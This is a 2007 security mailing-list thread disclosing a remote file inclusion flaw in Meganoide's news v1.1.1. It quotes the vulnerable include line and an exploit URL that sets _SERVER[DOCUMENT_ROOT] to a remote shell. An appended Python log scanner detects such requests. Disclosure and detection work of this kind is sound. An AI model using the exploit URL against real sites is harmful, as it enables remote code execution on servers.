[VIM] [True] Meganoide's news v1.1.1 < = RFi Vulnerabilities
str0ke
str0ke at milw0rm.com
Tue Feb 20 12:45:05 EST 2007
_SERVER[DOCUMENT_ROOT]=[shell]
Aren't only certain versions of PHP vulnerable to this kind of attack?
/str0ke
On 2/20/07, Noam Rathaus <noamr at beyondsecurity.com> wrote:
> Hi,
>
> Vendor appears to confirm problem:
> ----------------------
> Meganoide's news v1.1.2
> -----------------------
> - Bug: possibile inclusione di file remoti nel file "include.php"
>
> (Translation from Italian: possible inclusion of files remotely in the
> file "include.php")
>
> ---------- Forwarded Message ----------
>
> Subject: Meganoide's news v1.1.1 < = RFi Vulnerabilities
> Date: Friday 16 February 2007 19:54
> From: k4rtal at gmail.com
> To: bugtraq at securityfocus.com
>
> ##################################################################
> #Meganoide's news v1.1.1 < = RFi Vulnerabilities
> #
> #Download :
> http://www.spacemarc.it/scriptphp/index.php?script=meganoidesnews111 #
> #Script Name : Meganoide's news v1.1.1
> #
> #
> ##################################################################
> #
> #Coded By : KaRTaL
> #
> #
> #Contact : k4rtal[at]gmail[dot]com
> #
> #
> ##################################################################
> #
> #V.Code in : [path]/include.php
> #
> #
> # include("$_SERVER[DOCUMENT_ROOT]/news/config.inc.php");
> #
> #
> #Exploit : www.target.com/path/include.php?_SERVER[DOCUMENT_ROOT]=[shell]
> #
> #
> ##################################################################
> #
> #
> #Gretz : TiT , Doublekickx , str0ke , DermanTukr , M3rhametsiz , CaCa ,
> Gurkan142 , www.istikla-team.org #
> #
> #
> #
> ##################################################################
>
> -------------------------------------------------------
>
> --
> Noam Rathaus
> CTO
> 1616 Anderson Rd.
> McLean, VA 22102
> Tel: 703.286.7725 extension 105
> Fax: 888.667.7740
> noamr at beyondsecurity.com
> http://www.beyondsecurity.com
>
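Added example (not part of the original thread or the vendor's code): a web-log check for the request shape the advisory describes, a query parameter named after a PHP superglobal such as `_SERVER[DOCUMENT_ROOT]`. It generalizes to the other superglobal names; the log lines are constructed, the parameter values are placeholders, and the function names are this example's own.

```python
import re
from urllib.parse import unquote_plus

# PHP superglobal names that a request parameter should never be named after.
SUPERGLOBALS = {"GLOBALS", "_SERVER", "_GET", "_POST", "_COOKIE",
                "_FILES", "_ENV", "_REQUEST", "_SESSION"}

# Request line inside a common/combined log format entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded names (%255B) are seen."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def superglobal_params(url):
    """Return the query parameter names in url that target a superglobal."""
    hits = []
    query = url.partition("?")[2]
    for pair in re.split(r"[&;]", query):
        name = fully_decode(pair.split("=", 1)[0])
        base = name.split("[", 1)[0].strip()  # "_SERVER[X]" -> "_SERVER"
        if base in SUPERGLOBALS:
            hits.append(name)
    return hits

def scan(lines):
    """Yield (line_number, url, offending_names) for flagged requests."""
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if match and superglobal_params(match.group(1)):
            yield number, match.group(1), superglobal_params(match.group(1))

# Constructed sample log lines (documentation addresses, placeholder values).
SAMPLE_LOG = [
    '192.0.2.10 - - [20/Feb/2007:12:00:01 -0500] "GET /news/index.php?id=4 HTTP/1.1" 200 5120',
    '192.0.2.77 - - [20/Feb/2007:12:00:09 -0500] "GET /news/include.php?_SERVER[DOCUMENT_ROOT]=PLACEHOLDER HTTP/1.1" 200 312',
    '192.0.2.77 - - [20/Feb/2007:12:00:15 -0500] "GET /news/include.php?_SERVER%5BDOCUMENT_ROOT%5D=PLACEHOLDER HTTP/1.0" 200 312',
    '192.0.2.31 - - [20/Feb/2007:12:01:02 -0500] "GET /search.php?q=_SERVER+docs HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for number, url, names in scan(SAMPLE_LOG):
        print(f"line {number}: {names} in {url}")
```

The check keys on the parameter name only, so a search term that merely mentions `_SERVER` in its value (the last sample line) is not flagged.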